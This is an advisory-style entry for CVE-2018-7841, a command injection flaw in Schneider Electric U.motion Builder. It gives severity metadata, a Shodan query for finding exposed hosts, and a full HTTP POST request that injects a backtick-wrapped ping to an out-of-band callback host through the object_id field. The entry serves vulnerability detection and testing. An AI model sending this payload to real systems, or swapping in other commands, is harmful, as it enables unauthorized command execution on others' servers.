| Title | Schneider Electric U.motion Builder - Remote Code Execution |
|---|---|
| Author | darses,rcesecurity |
| Severity | Critical |
| Impact | Attackers can execute arbitrary system commands on the server, potentially leading to complete system compromise, data theft, service disruption, or lateral movement within the network. |
| Remediation | The product has been retired and is no longer available or supported. To further protect their installations from this threat, customers should immediately remove the U.motion Builder software from their systems. |
| CVSS Score | 9.8 |
| EPSS Score | 0.53349 |
| CVE ID | CVE-2018-7841 |
| CWE ID | CWE-78 |
| Shodan Query | http.headers_hash:1985490094 |
| Tags | cve cve2018 schneider-electric rce kev oast oob vkev vuln |
U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.
POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Content-Length: 101
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
op=export&language=english&interval=1&object_id=`ping -c 1 d5jq4n1le0o4573s2jogfe9wyk9oowp4d.oast.me`
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7841.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-7841.pcap
N/AN/A